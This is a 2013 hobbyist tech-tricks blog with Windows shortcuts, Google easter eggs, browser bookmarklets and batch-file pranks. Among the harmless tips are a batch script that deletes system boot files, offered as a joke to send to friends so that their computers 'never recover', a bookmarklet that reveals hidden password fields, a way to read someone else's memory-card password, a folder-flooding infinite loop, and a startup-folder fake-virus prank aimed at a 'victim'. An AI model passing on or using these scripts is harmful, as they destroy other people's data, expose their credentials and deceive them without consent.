Powered By Blogger

Saturday, 26 October 2013

Sem III Official GTU Practicles

Click Here For Java File  Java
Click Here For Unix File  Unix

Don't Forget To Say Thanks ;-)

Monday, 13 May 2013

Recieve Your E-Mails via Phone...!!!


- Here is a trick to retrieve all your incoming mails in your cell-phone..!!

- If you don't want to miss any of your important E-mails, then use this trick to get all your E-mails or Selected E-mails directly to your phone inbox.

This trick is using the facility E-mail Forwarding and its available in all E-mail Service providers.

Step 1:

Create a Free Account in Way2sms.com

Monday, 29 April 2013

Hidden windows-XP programs...!!!


Many hidden Windows-XP programs:-

1. Dr. Watson :

 
This an inbuilt windows repairing software !
 My name  is
Click start>>Run Now, type drwtsn32

2. Private Character Editor :
                                                                      

 Used for editing fonts,etc.

 Click Start>>Run Now, type eudcedit
 

AIRTEL Tune Created in 'C' !!

Hello, Friends..!
Here is a nice Program written in C which creates Famous Airtel Tune..See the power of C other then being taught in Colleges/Schools..!

#include<stdio.h>
#include<dos.h>
#include<conio.h>
float main(void)
{
float A,Bb,D,G,F;


Google Funny SearchTricks..!!


- Many of us might not know about these hidden tricks about Google Home page..
Just type the following phrase in Google Search Bar and See the magic..You will be amazed..!!
(Type words without quotes)

  - These tricks are called as EASTER EGGS..
  • "do a barrel roll" or "z or r twice" :
    The search results page will do a 360 degrees barrel roll effect before showing the results.
Barrel Roll Effect
 

How To See Password Behind Asterisk(*)..!!


If you have any field on a webpage that has been filled with * (asterisk) usually passwords, then you can view the content behind it.Simply paste this code in Address bar of Browser and press enter:-

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}
 Enjoy :-) 

Sunday, 28 April 2013

To see the PassWord of Memory Card...!!

 
Here is a simple trick to see any-one's memory card password..!!
1)Insert memory card into the card reader.
2)GOTO C:\system

3)Find file named mmcstore and rename it with   mmcstore.txt 

4)Open the file  and you wil find the password.

Trick 2 Lock Your PRIVATE Folder..!!

 
Suppose, you want to lock the folder games in d: which  
has the path D:\Games.In the same drive create a text file
and type
ren games
games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save
this text file as loc.bat

Stop users who disabled JavaScript.


One common way for users to block adverts is to simply disable JavaScript altogether. Although this method is not flawless since some plugins allow users to disable meta redirects; this ought to prove sufficient to deter the majority of users!
<noscript><meta http-equiv="refresh" content="0;url=noscript.php" /></noscript>
where the page noscript.php displays a polite warning to non-JS users requesting they enable JavaScript. Enjoy!

Show password field!


Now this could be very useful if you ever want to be able to see your password as you're typing it to make sure you haven't made any mistakes. Here is a simple password field. It says "password". Click the button below to show it's contents!





The very simple code which does that is this.



javascript:void(document.getElementById('password').type='text')

Just put that in the address bar as always!


NOTE: To get the id of the element just look at the source code (usually View --> Source Code)

Shake Your Web Browser.

 Place the following code in browser's Address bar.

CODE : 

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j=n;j>0;j--){self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)-accident

Picture for Listing #3. Size should be 500x300
As you can see, the hyper browser is very amusing, but wouldn't last long enough for a sneak-attack prank. For this escapade, you'll likely need to edit the code to last a little longer. To do so, find the statement that says i = 35, and change the number to something larger (300 will buy you about 30 seconds, 600 a minute, and so on).

Friday, 26 April 2013

Install Window 7 using USB drive.


Installing windows 7 using USB drive

What are basic requirements ?
-Windows 7 DVD
-And a USB drive having minimum capacity of 4GB.


 What  are advantages if we install window 7 using flash drive ?

-First overall speed of the installation willl increase significantly.
-Carrying USB is more easy and convienient than DVD.
-It also become possible to install windows 7 on  that systems which are not having  DVD drives    such as Net book..


Steps of installing windows 7 using USB drive.
---- Insert USB
- Run the command prompt as administrator. (Type cmd in start and right click on cmd and click on "run as administrator".)
-In the command prompt type the following command

Create your own customized RUN command.


1) Right click on the desktop screen and click on "New" then click on "Shortcut".


2) Browse for the program for which you want to create the command.(Navigate where the program is installed. In my case location is "C:\Program Files\Windows Media Player\wmplayer.exe") . Target to the main file of the program such as wmplayer, iexplore etc. 

Make over 1,000 folders in few seconds.



Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top


@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop


2. Save it as 1000folders.bat


3. Run  it

Shut Down a Computer Forever.


Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Fake warning message.





Ok first we will start with the easy one, the fake warning message.
This is how to do it:
1.Open note pad
2.Type this in
@echo off
msg * Warning your computer has detected a virus.
msg * To remove the virus click OK or close this box
msg * Your Hard drives are now being formatted
msg * Please wait ...........
msg * APRIL FOOLS

3.Save the file as April-fools.BAT
4.Right click on the file and press hidden
5.Go to folder options and click show hidden files
6.Cut the file and place it in the victims Start up folder in the start menu
7.Go back to folder options and click do not show hidden files.

Now what each of the lines you typed in done:
@echo off << this runs the commands in the background so the victim will not see any codes
msg * <<this commands the computer to show a message
msg * hahahah <<this is what the message will display

The results
when the victim starts up there computer the first message will appear, when they click OK the next one will appear and make the victim think there hard drive is being formatted until they get the last message saying APRIL FOOLS.

Thursday, 25 April 2013

TOP 107 COMMAND PROMPT TRICKS.

Open cmd.exe from "Run" & Try the following commands 
As per your requirements.

Here are those:-

1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap

20 facts about technology that might surprise you.

Wednesday, 24 April 2013

Know... Who Used Your Pc In Your Absence, What Activity He Did ?

First Open:

start > run > and type "eventvwr.msc" (without quote).

Events are stored in three log files:

Application
Security
System

These logs can be reviewed and archived.

For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.


Creat you own search engine.

1. Go to www.goglogo.com
2. Enter you search engine name and Press "ok".
3. Now you hawe your own sarch engine.